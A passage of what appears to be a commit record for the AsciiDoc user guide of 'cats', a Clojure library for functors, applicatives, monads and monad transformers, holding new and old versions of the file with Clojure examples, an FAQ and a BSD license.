3])\n;; => [2 3 4]\n----\n\nThe main difference compared to the previous example with Clojure's map function, is that\nmap returns lazy seqs no matter what collection we pass to it:\n\n[source, clojure]\n----\n(type (map inc [1 2 3]))\n;; => clojure.lang.LazySeq (cljs.core\/LazySeq in ClojureScript)\n----\n\nBut why can we pass vectors to fmap? Because some Clojure container types like vectors,\nlists and sets also implement the functor abstraction.\n\n\n=== Applicative\n\nLet's continue with applicative functors. The Applicative Functor represents\nsome sort of \"computational context\" like a plain Functor, but with ability to\nexecute a function wrapped in the same context.\n\nThe Applicative Functor abstraction consists of two functions: *fapply* and\n*pure*.\n\n.Signature of *fapply* function\n[source, clojure]\n----\n(fapply [af av])\n----\n\nNOTE: the *pure* function will be explained later.\n\nThe use case for Applicative Functors is much the same as plain Functors: safe\nevaluation of some computation in a context.\n\nLet's see an example to better understand the differences between functor and\napplicative functor:\n\nImagine you have some factory function that, depending on the language, returns a\ngreeter function, and you only support a few languages.\n\n\n[source, clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (fn [name] (str \"Hola \" name))\n \"en\" (fn [name] (str \"Hello \" name))\n nil))\n----\n\nNow, before using the resulting greeter you should always defensively check if returned\ngreeter is a valid function or is a nil value.\n\nLet's convert this factory to use Maybe type:\n\n[source, clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (just (fn [name] (str \"Hola \" name)))\n \"en\" (just (fn [name] (str \"Hello \" name)))\n (nothing)))\n----\n\nAs you can see, this version of the factory differs only slightly from the\noriginal implementation. And this tiny change gives you a new superpower: you\ncan apply the returned greeter to any value without a defensive nil check:\n\n[source, clojure]\n----\n(fapply (make-greeter \"es\") (just \"Alex\"))\n;; => #<Just [Hola Alex]>\n\n(fapply (make-greeter \"en\") (just \"Alex\"))\n;; => #<Just [Hello Alex]>\n\n(fapply (make-greeter \"it\") (just \"Alex\"))\n;; => #<Nothing >\n----\n\nMoreover, the applicative functor comes with *pure* function, and the main purpose of this function is\nto put some value in side-effect-free context of the current type.\n\nExamples:\n\n[source, clojure]\n----\n(require '[cats.monad.maybe])\n(require '[cats.monad.either])\n\n(pure maybe\/maybe-monad 5)\n;; => #<Just [5]>\n\n(pure either\/either-monad :bar)\n;; => #<Either [:bar :right]>\n----\n\nIf you do not understand the purpose of the *pure* function, the next section\nshould clarify its purpose.\n\n\n=== Monad\n\nMonads are the most discussed programming concept to come from category theory. Like functors and\napplicatives, monads deal with data in contexts.\n\nAdditionaly, monads can also transform contexts by unwrapping data, applying functions to it and\nputting new values in a completely different context.\n\nThe monad abstraction consists of two functions: *bind* and *return*\n\n.Bind function signature.\n[source,clojure]\n----\n(bind [mv f])\n----\n\nAs you can see, bind works much like a Functor but with inverted arguments. The main difference is\nthat in a monad, the function is a responsible for wrapping a returned value in a context.\n\n.Example usage of the bind higher-order function.\n[source,clojure]\n----\n(bind (just 1)\n (fn [v] (just (inc v))))\n----\n\nOne of the key features of the bind function is that any computation executed within the context of\nbind (monad) knows the context type implicitly. With this, if you apply some computation over some\nmonadic value and you want to return the result in the same container context but don't know\nwhat that container is, you can use `return` or `pure` functions:\n\n.Usage of return function in bind context.\n[source,clojure]\n----\n(bind (just 1)\n (fn [v]\n (return (inc v))))\n;; => #<Just [2]>\n----\n\nThe `return` or `pure` functions, when called with one argument, try to use the dynamic scope context\nvalue that's set internally by the `bind` function. Therefore, you can't use them with one argument outside of a `bind` context.\n\nWe now can compose any number of computations using monad *bind*\nfunctions. But observe what happens when the number of computations increases:\n\n.Composability example of bind function.\n[source, clojure]\n----\n(bind (just 1)\n (fn [a]\n (bind (just (inc a))\n (fn [b]\n (return (* b 2))))))\n----\n\nThis can quickly lead to callback hell. To solve this, _cats_ comes with a powerful\nmacro: *mlet*\n\n.Previous example but using *mlet* macro.\n[source, clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))]\n (return (* b 2)))\n----\n\nNOTE: If you are coming from Haskell, mlet represents the *do-syntax*.\n\n\nIf you want to use regular (non-monadic) let bindings inside an `mlet` block, you can do so using\n`:let` and a binding vector inside the mlet bindings:\n\n[source, clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))\n :let [z (+ a b)]]\n (return (* z 2)))\n----\n\n\n=== Monad Transformers\n\n==== Motivation\n\nWe can combine two functors and get a new one automatically. Given any two functors _a_ and _b_,\nwe can implement a generic `fmap` for the type _a (b Any)_, we'll call it fmap2:\n\n[source, clojure]\n----\n(ns functor.example\n (:require [cats.core :refer [fmap]]\n [cats.monad.maybe :refer [just]])\n (:use [cats.builtin]))\n\n(defn fmap2\n [f fv]\n (fmap (partial fmap f) fv))\n\n; Here, 'a' is [] and 'b' is Maybe, so the type of the\n; combined functor is a vector of Maybe values that could\n; contain a value of any type.\n(fmap2 inc [(maybe\/just 1) (maybe\/just 2)])\n;;=> [#<Just [2]> #<Just [3]>]\n----\n\nHowever, monads don't compose as nicely as functors do. We have to actually implement\nthe composition ourselves.\n\nIn some circumstances we would like combine the effects of two monads into another one. We call the\nresulting monad a monad transformer, which is the composition of a \"base\" and a \"inner\" monad. A\nmonad transformer is itself a monad.\n\n\n==== Using monad transformers\n\nLet's combine the effects of two monads: State and Maybe. We'll create the transformer\nusing State as the base monad since we want the resulting type to be a stateful computation\nthat may fail: `s -> Maybe (a, s)`.\n\nAlmost every monad implemented in _cats_ has a monad transformer for combining it with\nany other monad. The transformer functions take a Monad as their argument and they\nreturn a reified MonadTrans:\n\n[source, clojure]\n----\n(ns transformers.example\n (:require [cats.core :as m]\n [cats.data :as data]\n [cats.monad.maybe :as maybe]\n [cats.monad.state :as state]))\n\n(def maybe-state (state\/state-transformer maybe\/maybe-monad))\n\n(m\/with-monad maybe-state\n (state\/run-state (m\/return 42) {}))\n\n;;=> #<Just [#<Pair [42 {}]>]>\n----\n\nAs we can see in the example below, the return of the `maybe-state` monad creates a stateful\nfunction that yields a Maybe containing a pair (value, next state).\n\nYou probably noticed that we had to wrap the state function invocation with `cats.core\/with-monad`.\nWhen working with monad transformers, we have to be explicit about what monad we are using to implement\nthe binding policy since there is no way to distinguish values from a transformer type from those of\na regular monad.\n\nThe `maybe-state` monad combines the semantics of both State and Maybe.\n\nLet's see it in action:\n\n[source, clojure]\n----\n(defn any-char [s]\n \"A function that takes an input string as an state and\n consumes one character yielding it as a the value. The\n new state is the input string with the character consumed.\n\n It fails when there isn't a character to consume.\"\n (if (Clojure.string\/blank? s)\n (maybe\/nothing)\n (maybe\/just (data\/pair (first s)\n (.substring s 1)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-char \"Foo\"))\n;;=> #<Just [#<Pair [F oo]>]>\n\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet\n [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"Foo\"))\n;;=> #<Just [#<Pair [Fo o]>]>\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"F\"))\n;;=> #<Nothing >\n\n; We could have written `any-two-chars` more succinctly by using `cats.core\/with-monad`,\n; which is intended as syntactic sugar for transformer usage.\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n; We also define a function for applying parser to a given input\n(defn parse [parser input]\n (m\/with-monad maybe-state\n (let [parse-result (state\/run-state parser input)]\n (maybe\/from-maybe parse-result))))\n----\n\n== Monad types\n\nIn our examples we have seen two types that implement\nthe monad abstraction: Maybe and Either. But these are only two of the types\nthat implements the Monad abstraction. In this section, we will explain the different\nmonad types supported by _cats_ library.\n\n=== Maybe\n\nThis is one of the two most used monad types (also named Optional in other programming\nlanguages).\n\nMaybe\/Optional is a polymorphic type that represents encapsulation of an optional value; e.g. it is\nused as the return type of functions which may or may not return a meaningful value when they\nare applied. It consists of either an empty constructor (called None or Nothing), or a constructor\nencapsulating the original data type A (written Just A or Some A).\n\n_cats_, implements two constructors:\n\n- `(just v)`: represents just a value in a context.\n- `(nothing)`: represents a failure or null.\n\n.Usage example of *Maybe* constructors.\n[source, clojure]\n----\n(require '[cats.monad.maybe :refer :all])\n(just 1)\n;; => #<Just [1]>\n(nothing)\n;; => #<Nothing >\n----\n\n\n=== Either\n\nEither is another type that represents a result of computation, but (in contrast with maybe)\nit can return some data with a failed computation result.\n\nIn _cats_ it has two constructors:\n\n- `(left v)`: represents a failure.\n- `(right v)`: represents a successful result.\n\n.Usage example of *Either* constructors.\n[source, clojure]\n----\n(require '[cats.monad.either :refer :all])\n\n(right :valid-value)\n;; => #<Right [:valid-value :right]>\n\n(left \"Error message\")\n;; => #<Either [Error message :left]>\n----\n\nNOTE: Either is also (like Maybe) Functor, Applicative Functor and Monad.\n\n\n=== Try\n\nAlso called Exception.\n\nThe `Try` type represents a computation that may either result in an exception\nor return a successfully computed value. It's similar to, but semantically\ndifferent from, the `Either` type.\n\nIt is an analogue of the try-catch block: it replaces try-catch's stack-based error\nhandling with heap-based error handling. Instead of having an exception thrown and\nhaving to deal with it immediately in the same thread, it disconnects the error\nhandling and recovery.\n\n.Usage example of *try-on* macro.\n[source, clojure]\n----\n(require '[cats.monad.exception :as exc])\n\n(exc\/try-on 1)\n;; => #<Success [1]>\n\n(exc\/try-on (+ 1 nil))\n;; => #<Failure [#<NullPointerException java.lang.NullPointerException>]>\n----\n\n_cats_ comes with other syntactic sugar macros: `try-or-else` that\nreturns a default value if a computation fails, and `try-or-recover` that lets\nyou handle the return value when executing a function with the exception as\nfirst parameter.\n\n\n.Usage example of `try-or-else` macro.\n[source, clojure]\n----\n(exc\/try-or-else (+ 1 nil) 2)\n;; => #<Success [2]>\n----\n\n.Usage example of `try-or-recover` macro.\n[source, clojure]\n----\n(exc\/try-or-recover (+ 1 nil)\n (fn [e]\n (cond\n (instance? NullPointerException e) 0\n :else 100)))\n;; => #<Success [0]>\n----\n\n\n=== State\n\nState monad in one of the special cases of monads most used in Haskell. It has different\npurposes including: lazy computation, composition, and maintaining state without explicit state.\n\nThe de-facto monadic type of the state monad is a plain function. Function represents a computation\nas is (without executing it). Obviously, a function should have some special characteristics to work\nin monad state composition.\n\n.Valid function for valid state monad\n[source, clojure]\n----\n(fn [state]\n \"Takes state as argument and return a vector\n with first argument with procesed value and\n second argument the transformed new state.\"\n (let [newvalue (first state)\n newstate (next state)]\n [newvalue newstate]))\n----\n\nYou just saw an example of the low-level primitive state monad. For basic usage\nyou do not need to build your own functions, just use some helpers that _cats_ provides.\n\nLet's look at one example before explaining the details:\n\n.Lazy composition of computations\n[source, clojure]\n----\n(m\/mlet [state (m\/get-state)\n _ (m\/put-state (next state))]\n (return (first state)))\n;;=> #<State cats.monad.state.State@2eebabb6>\n----\n\nAt the moment of evaluation in the previous expression, anything that we have defined\nis executed. But instead of returning the unadorned final value of the computation,\na strange\/unknown object is returned of type *State*.\n\nState is simply a wrapper for Clojure functions, nothing more.\n\nNow, it's time to execute the composed computation. For this we can use one of the following\nfunctions exposed by _cats_: `run-state`, `eval-state` and `exec-state`.\n\n- `run-state` function executes the composed computation and returns both the value and the\n result state.\n- `eval-state` function executes the composed computation and returns the resulting value\n discarding the state.\n- `exec-state` function executes the composed computation and return only the resulting\n state, ignoring the resulting value.\n\n.This is what happens when we execute these three functions over previously generated `State` instance\n[source, clojure]\n----\n(m\/run-state s [1 2 3])\n;;=> #<Pair [1 (2 3)]>\n(m\/eval-state s [1 2 3])\n;;=> 1\n(m\/exec-state s [1 2 3])\n;;=> (2 3)\n----\n\nNOTE: the pair instance returned by `run-state` function works like any other seq in Clojure, with\nthe difference that pairs can only have two slots.\n\nThis is a very basic example of the state monad, it has a lot of use cases and explaining all them\nseems out of the scope of this document.\n\nHowever, if you have better examples to explain the state monad, documentation for another monad or\nany other contribution is always welcome.\n\n\n=== Channel\n\nIn asynchronous environments with clojure and clojurescript we tend to use core.async, because it\nis a very powerfull abstraction.\n\nIt would be awesome to be able to work with channel as a monadic type, and combine it with error\nmonads for short-circuiting async computations that may fail.\n\nLet's start using channel as a functor:\n[source, clojure]\n----\n(require '[cljs.core.async :refer [chan put! <!!]])\n(require '[cats.monad.channel :as channel])\n\n;; Declare arbitrary channel with initial value\n(def mychan (channel\/with-value 2))\n\n;; Use channel as a functor\n(<!! (m\/fmap inc mychan))\n;; => 3\n----\n\nThe channel type also fulfills the monad abstraction, let see it in action:\n\n[source, clojure]\n----\n(def result (m\/mlet [a (channel\/with-value 2)\n b (channel\/with-value 3)]\n (m\/return (+ a b))))\n(<!! result)\n;; => 5\n----\n\nBut the best of all is coming: combine the channel monad with error monads. It allows to build very concise\nand simple asynchronous APIs. Let see how you can use it your application:\n\n[source, clojure]\n----\n(require '[cats.monad.either :as either])\n\n;; Declare a monad transformer\n(def either-chan-m\n (either\/either-transformer channel\/channel-monad))\n\n;; A success example\n(<!! (m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/right 2))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Right [5]>\n----\n\nAs you can see, the code looks very similar to the previos example, with the exception that\nthe value in a channel is not a simple plain value, is an either instance.\n\nLet's see what happens if some computation fails in the mlet composition:\n\n[source, clojure]\n----\n(<!! (m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/left \"Some error\"))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Left [Some error]>\n----\n\nThe result is the expected short-circuiting left, without unexpected nullpointer exceptions\nor similar issues.\n\nWith this compositional power, you can model your asynchronous API with a complete\nerror handling using any error monad (in this case Either).\n\n\n=== Reader\n\nTODO\n\n\n=== Writer\n\nTODO\n\n\n=== Continuation\n\nTODO\n\n\n=== Vector\n\nTODO\n\n\n== FAQ\n\n=== What are the difference with other existing libraries?\n\nThis is an incomplete list of differences with other existing libraries:\n\n- The official monads library `algo.monads` is very good, but its approach for modeling\n is slighty limited (e.g. you always need to specify what monad you want use instead of\n relying on the type). And obviously because it only has monads.\n- Fluokitten is the best library that we found, but the future of it is uncertain. One big\n difference with fluokitten is that `cats` doesn't aim to extend every Clojure type\n with monadic protocols, for the obvious reason that monad; functor and applicative represents\n context\/wrapper types and it doesn't make sense to implement Functor protocol for `java.lang.String`.\n- `bwo\/monads` is the last monads library. It is completely undocumented and its implementation\n has much unnecesary complexity.\n\n\n=== What Clojure types implements some of the Category Theory abstractions?\n\nIn contrast to other similar libraries in Clojure, _cats_ doesn't intend to extend Clojure types\nthat don't act like containers. For example, Clojure keywords are values but can not be containers so\nthey should not extend any of the previously explained protocols.\n\n\n.Summary of Clojure types and implemented protocols\n[options=\"header\"]\n|=============================================================\n| Name | Implemented protocols\n| vector | Functor, Applicative, Monad, MonadZero, MonadPlus\n| hash-set | Functor, Applicative, Monad, MonadZero, MonadPlus\n| list | Functor, Applicative, Monad, MonadZero, MonadPlus\n|=============================================================\n\n\n== How to Contribute?\n\n=== Philosophy\n\nFive most important rules:\n\n- Beautiful is better than ugly.\n- Explicit is better than implicit.\n- Simple is better than complex.\n- Complex is better than complicated.\n- Readability counts.\n\nAll contributions to _cats_ should keep these important rules in mind.\n\n\n=== Procedure\n\n_cats_ does not have many restrictions for contributions. Just follow these\nsteps depending on the situation:\n\n*Bugfix*:\n\n- Fork the GitHub repo.\n- Fix a bug\/typo on a new branch.\n- Make a pull-request to master.\n\n*New feature*:\n\n- Open new issue with the new feature proposal.\n- If it is accepted, follow the same steps as \"bugfix\".\n\n\n=== License\n\n[source,text]\n----\nCopyright (c) 2014-2015 Andrey Antukh <niwi@niwi.be>\nCopyright (c) 2014-2015 Alejandro G\u00f3mez\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and\/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n----\n","old_contents":"= Cats Documentation\nAndrey Antukh & Alejandro G\u00f3mez\n0.4.0-SNAPSHOT\n:toc: left\n:numbered:\n:source-highlighter: pygments\n:pygments-style: friendly\n\nimage:logo.png[cats logo]\n\n== Introduction\n\nCategory Theory abstractions for Clojure.\n\n=== Why another library?\n\nBecause the cats library:\n\n- targets both of the most-used Clojure implementations: *Clojure (jvm)* and *ClojureScript(js)*\n- aims to have the simplest implementation of the supported abstractions.\n- aims to have more abstractions that are simple monads.\n- has documentation as first class citizen.\n- licensed under a permissive license (compared to other libraries): BSD (2-Clause)\n\n\n== Project Maturity\n\nSince _cats_ is a young project, there can be some link:api\/index.html#id[API] breakage.\n\n\n== Install\n\nThis section covers installing _cats_.\n\n\n=== Leiningen\n\nThe simplest way to use _cats_ in a Clojure project is by including\nit as a dependency in your *_project.clj_*:\n\n[source,clojure]\n----\n[cats \"0.4.0-SNAPSHOT\"]\n----\n\n\n=== Maven\n\nAlso, you can use it with Maven. First, add the Clojars repository:\n\n[source,xml]\n----\n<repository>\n <id>clojars.org<\/id>\n <url>http:\/\/clojars.org\/repo<\/url>\n<\/repository>\n----\n\nThen for cats:\n\n[source,xml]\n----\n<dependency>\n <groupId>cats<\/groupId>\n <artifactId>cats<\/artifactId>\n <version>0.4.0-SNAPSHOT<\/version>\n<\/dependency>\n----\n\n\n=== Get the Code\n\n_cats_ is open source and can be found on link:https:\/\/github.com\/funcool\/cats[github].\n\nYou can clone the public repository with this command:\n\n[source,text]\n----\ngit clone https:\/\/github.com\/funcool\/cats\n----\n\n\n== User Guide\n\nThis section introduces almost all the category theory abstractions that the _cats_ library\nsupports.\n\nWe will use the _Maybe_ for the example snippets, because it has support for all\nthe abstractions and it is very easy to understand. You can read more about it in the next\nsection of the documentation.\n\n\n=== Functor\n\nLet's start with the functor. The Functor represents some sort of \"computational context\", and the\nabstraction consists of one unique function: *fmap*.\n\n.Signature of *fmap* function\n[source, Clojure]\n----\n(fmap [f fv])\n----\n\nThe higher-order function *fmap* takes a plain function as the first parameter and\nvalue wrapped in a functor context as the second parameter. It extracts the inner value\napplies the function to it, and returns the result wrapped in same type as the second\nparameter.\n\nBut, what is the *functor context*? It sounds more complex than it is. A Functor\nwrapper is any type that acts as \"Box\" and implements the `Context` and `Functor` protocols.\n\n.One good example of a functor is the *Maybe* type:\n[source, Clojure]\n----\n(require '[cats.monad.maybe :as maybe])\n\n;; `just` function is one of two constructors of Maybe\n\n(maybe\/just 2)\n;; => #<Just [2]>\n----\n\nLet's see one example using *fmap* over *just* instance:\n\n.Example using fmap over *just*.\n[source, Clojure]\n----\n(require '[cats.core :as m]\n '[cats.monad.maybe :refer [just]])\n\n(m\/fmap inc (just 1))\n;; => #<Just [2]>\n----\n\nWe mentioned above that *fmap* extracts the value from the functor context. You will also want to\nextract values wrapped by *just* and you can do that with *from-maybe*.\n\n.Example using *from-maybe* to extract values wrapped by *just*.\n[source, Clojure]\n----\n(require '[cats.monad.maybe :refer [just from-maybe]])\n\n(from-maybe (just 1))\n;; => 1\n(from-maybe (nothing))\n;; => nil\n(from-maybe (nothing) 42)\n;; => 42\n----\n\nThe *Maybe* type also has another constructor: `nothing`. It represents the absence of a value.\nIt is a safe substitute for `nil` and may represent failure.\n\nLet's see what happens if we perform the same operation as the previous example over a *nothing*\ninstance:\n\n.Example using fmap over *nothing*.\n[source, Clojure]\n----\n(fmap inc (nothing))\n;; => #<Nothing >\n----\n\nOh, awesome, instead of raising a `NullPointerException`, it just returns *nothing*. Another\nadvantage of using the functor abstraction, is that it always returns a result\nof the same type as its second argument.\n\nLet's see an example of applying fmap over a Clojure vector:\n\n.Example using fmav over *vector*.\n[source, Clojure]\n----\n(fmap inc [1 2 3])\n;; => [2 3 4]\n----\n\nThe main difference compared to the previous example with Clojure's map function, is that\nmap returns lazy seqs no matter what collection we pass to it:\n\n[source, Clojure]\n----\n(type (map inc [1 2 3]))\n;; => clojure.lang.LazySeq (cljs.core\/LazySeq in ClojureScript)\n----\n\nBut why can we pass vectors to fmap? Because some Clojure container types like vectors,\nlists and sets also implement the functor abstraction.\n\n\n=== Applicative\n\nLet's continue with applicative functors. The Applicative Functor represents\nsome sort of \"computational context\" like a plain Functor, but with ability to\nexecute a function wrapped in the same context.\n\nThe Applicative Functor abstraction consists of two functions: *fapply* and\n*pure*.\n\n.Signature of *fapply* function\n[source, Clojure]\n----\n(fapply [af av])\n----\n\nNOTE: the *pure* function will be explained later.\n\nThe use case for Applicative Functors is much the same as plain Functors: safe\nevaluation of some computation in a context.\n\nLet's see an example to better understand the differences between functor and\napplicative functor:\n\nImagine you have some factory function that, depending on the language, returns a\ngreeter function, and you only support a few languages.\n\n\n[source, Clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (fn [name] (str \"Hola \" name))\n \"en\" (fn [name] (str \"Hello \" name))\n nil))\n----\n\nNow, before using the resulting greeter you should always defensively check if returned\ngreeter is a valid function or is a nil value.\n\nLet's convert this factory to use Maybe type:\n\n[source, Clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (just (fn [name] (str \"Hola \" name)))\n \"en\" (just (fn [name] (str \"Hello \" name)))\n (nothing)))\n----\n\nAs you can see, this version of the factory differs only slightly from the\noriginal implementation. And this tiny change gives you a new superpower: you\ncan apply the returned greeter to any value without a defensive nil check:\n\n[source, Clojure]\n----\n(fapply (make-greeter \"es\") (just \"Alex\"))\n;; => #<Just [Hola Alex]>\n\n(fapply (make-greeter \"en\") (just \"Alex\"))\n;; => #<Just [Hello Alex]>\n\n(fapply (make-greeter \"it\") (just \"Alex\"))\n;; => #<Nothing >\n----\n\nMoreover, the applicative functor comes with *pure* function, and the main purpose of this function is\nto put some value in side-effect-free context of the current type.\n\nExamples:\n\n[source, Clojure]\n----\n(require '[cats.monad.maybe])\n(require '[cats.monad.either])\n\n(pure maybe\/maybe-monad 5)\n;; => #<Just [5]>\n\n(pure either\/either-monad :bar)\n;; => #<Either [:bar :right]>\n----\n\nIf you do not understand the purpose of the *pure* function, the next section\nshould clarify its purpose.\n\n\n=== Monad\n\nMonads are the most discussed programming concept to come from category theory. Like functors and\napplicatives, monads deal with data in contexts.\n\nAdditionaly, monads can also transform contexts by unwrapping data, applying functions to it and\nputting new values in a completely different context.\n\nThe monad abstraction consists of two functions: *bind* and *return*\n\n.Bind function signature.\n[source,Clojure]\n----\n(bind [mv f])\n----\n\nAs you can see, bind works much like a Functor but with inverted arguments. The main difference is\nthat in a monad, the function is a responsible for wrapping a returned value in a context.\n\n.Example usage of the bind higher-order function.\n[source,Clojure]\n----\n(bind (just 1)\n (fn [v] (just (inc v))))\n----\n\nOne of the key features of the bind function is that any computation executed within the context of\nbind (monad) knows the context type implicitly. With this, if you apply some computation over some\nmonadic value and you want to return the result in the same container context but don't know\nwhat that container is, you can use `return` or `pure` functions:\n\n.Usage of return function in bind context.\n[source,Clojure]\n----\n(bind (just 1)\n (fn [v]\n (return (inc v))))\n;; => #<Just [2]>\n----\n\nThe `return` or `pure` functions, when called with one argument, try to use the dynamic scope context\nvalue that's set internally by the `bind` function. Therefore, you can't use them with one argument outside of a `bind` context.\n\nWe now can compose any number of computations using monad *bind*\nfunctions. But observe what happens when the number of computations increases:\n\n.Composability example of bind function.\n[source, Clojure]\n----\n(bind (just 1)\n (fn [a]\n (bind (just (inc a))\n (fn [b]\n (return (* b 2))))))\n----\n\nThis can quickly lead to callback hell. To solve this, _cats_ comes with a powerful\nmacro: *mlet*\n\n.Previous example but using *mlet* macro.\n[source, Clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))]\n (return (* b 2)))\n----\n\nNOTE: If you are coming from Haskell, mlet represents the *do-syntax*.\n\n\nIf you want to use regular (non-monadic) let bindings inside an `mlet` block, you can do so using\n`:let` and a binding vector inside the mlet bindings:\n\n[source, Clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))\n :let [z (+ a b)]]\n (return (* z 2)))\n----\n\n\n=== Monad Transformers\n\n==== Motivation\n\nWe can combine two functors and get a new one automatically. Given any two functors _a_ and _b_,\nwe can implement a generic `fmap` for the type _a (b Any)_, we'll call it fmap2:\n\n[source, Clojure]\n----\n(ns functor.example\n (:require [cats.core :refer [fmap]]\n [cats.monad.maybe :refer [just]])\n (:use [cats.builtin]))\n\n(defn fmap2\n [f fv]\n (fmap (partial fmap f) fv))\n\n; Here, 'a' is [] and 'b' is Maybe, so the type of the\n; combined functor is a vector of Maybe values that could\n; contain a value of any type.\n(fmap2 inc [(maybe\/just 1) (maybe\/just 2)])\n;;=> [#<Just [2]> #<Just [3]>]\n----\n\nHowever, monads don't compose as nicely as functors do. We have to actually implement\nthe composition ourselves.\n\nIn some circumstances we would like combine the effects of two monads into another one. We call the\nresulting monad a monad transformer, which is the composition of a \"base\" and a \"inner\" monad. A\nmonad transformer is itself a monad.\n\n\n==== Using monad transformers\n\nLet's combine the effects of two monads: State and Maybe. We'll create the transformer\nusing State as the base monad since we want the resulting type to be a stateful computation\nthat may fail: `s -> Maybe (a, s)`.\n\nAlmost every monad implemented in _cats_ has a monad transformer for combining it with\nany other monad. The transformer functions take a Monad as their argument and they\nreturn a reified MonadTrans:\n\n[source, Clojure]\n----\n(ns transformers.example\n (:require [cats.core :as m]\n [cats.data :as data]\n [cats.monad.maybe :as maybe]\n [cats.monad.state :as state]))\n\n(def maybe-state (state\/state-transformer maybe\/maybe-monad))\n\n(m\/with-monad maybe-state\n (state\/run-state (m\/return 42) {}))\n\n;;=> #<Just [#<Pair [42 {}]>]>\n----\n\nAs we can see in the example below, the return of the `maybe-state` monad creates a stateful\nfunction that yields a Maybe containing a pair (value, next state).\n\nYou probably noticed that we had to wrap the state function invocation with `cats.core\/with-monad`.\nWhen working with monad transformers, we have to be explicit about what monad we are using to implement\nthe binding policy since there is no way to distinguish values from a transformer type from those of\na regular monad.\n\nThe `maybe-state` monad combines the semantics of both State and Maybe.\n\nLet's see it in action:\n\n[source, Clojure]\n----\n(defn any-char [s]\n \"A function that takes an input string as an state and\n consumes one character yielding it as a the value. The\n new state is the input string with the character consumed.\n\n It fails when there isn't a character to consume.\"\n (if (Clojure.string\/blank? s)\n (maybe\/nothing)\n (maybe\/just (data\/pair (first s)\n (.substring s 1)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-char \"Foo\"))\n;;=> #<Just [#<Pair [F oo]>]>\n\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet\n [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"Foo\"))\n;;=> #<Just [#<Pair [Fo o]>]>\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"F\"))\n;;=> #<Nothing >\n\n; We could have written `any-two-chars` more succinctly by using `cats.core\/with-monad`,\n; which is intended as syntactic sugar for transformer usage.\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n; We also define a function for applying parser to a given input\n(defn parse [parser input]\n (m\/with-monad maybe-state\n (let [parse-result (state\/run-state parser input)]\n (maybe\/from-maybe parse-result))))\n----\n\n== Monad types\n\nIn our examples we have seen two types that implement\nthe monad abstraction: Maybe and Either. But these are only two of the types\nthat implements the Monad abstraction. In this section, we will explain the different\nmonad types supported by _cats_ library.\n\n=== Maybe\n\nThis is one of the two most used monad types (also named Optional in other programming\nlanguages).\n\nMaybe\/Optional is a polymorphic type that represents encapsulation of an optional value; e.g. it is\nused as the return type of functions which may or may not return a meaningful value when they\nare applied. It consists of either an empty constructor (called None or Nothing), or a constructor\nencapsulating the original data type A (written Just A or Some A).\n\n_cats_, implements two constructors:\n\n- `(just v)`: represents just a value in a context.\n- `(nothing)`: represents a failure or null.\n\n.Usage example of *Maybe* constructors.\n[source, Clojure]\n----\n(require '[cats.monad.maybe :refer :all])\n(just 1)\n;; => #<Just [1]>\n(nothing)\n;; => #<Nothing >\n----\n\n\n=== Either\n\nEither is another type that represents a result of computation, but (in contrast with maybe)\nit can return some data with a failed computation result.\n\nIn _cats_ it has two constructors:\n\n- `(left v)`: represents a failure.\n- `(right v)`: represents a successful result.\n\n.Usage example of *Either* constructors.\n[source, Clojure]\n----\n(require '[cats.monad.either :refer :all])\n\n(right :valid-value)\n;; => #<Right [:valid-value :right]>\n\n(left \"Error message\")\n;; => #<Either [Error message :left]>\n----\n\nNOTE: Either is also (like Maybe) Functor, Applicative Functor and Monad.\n\n\n=== Try\n\nAlso called Exception.\n\nThe `Try` type represents a computation that may either result in an exception\nor return a successfully computed value. It's similar to, but semantically\ndifferent from, the `Either` type.\n\nIt is an analogue of the try-catch block: it replaces try-catch's stack-based 